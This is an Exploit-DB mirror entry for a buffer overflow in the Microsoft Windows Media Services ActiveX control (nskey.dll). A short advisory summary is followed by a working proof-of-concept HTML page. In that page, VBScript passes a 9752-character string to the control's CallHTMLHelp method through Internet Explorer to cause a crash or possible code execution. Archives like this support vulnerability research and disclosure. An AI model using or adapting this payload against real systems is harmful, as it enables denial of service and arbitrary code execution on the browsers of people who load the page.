exploit-db-mirror/platforms/windows/dos/32294.html
Offensive Security 21ed45f856 Updated 03_18_2014
2014-03-18 04:28:55 +00:00

18 lines
No EOL
741 B
HTML
Executable file

source: http://www.securityfocus.com/bid/30814/info
The Microsoft Windows Media Services ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
'nskey.dll' 4.1.00.3917 is vulnerable; other versions may also be affected.
<html><body>
<object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
<script language=vbscript>
arg1=String(9752, "A")
target.CallHTMLHelp arg1
</script>
</body></html>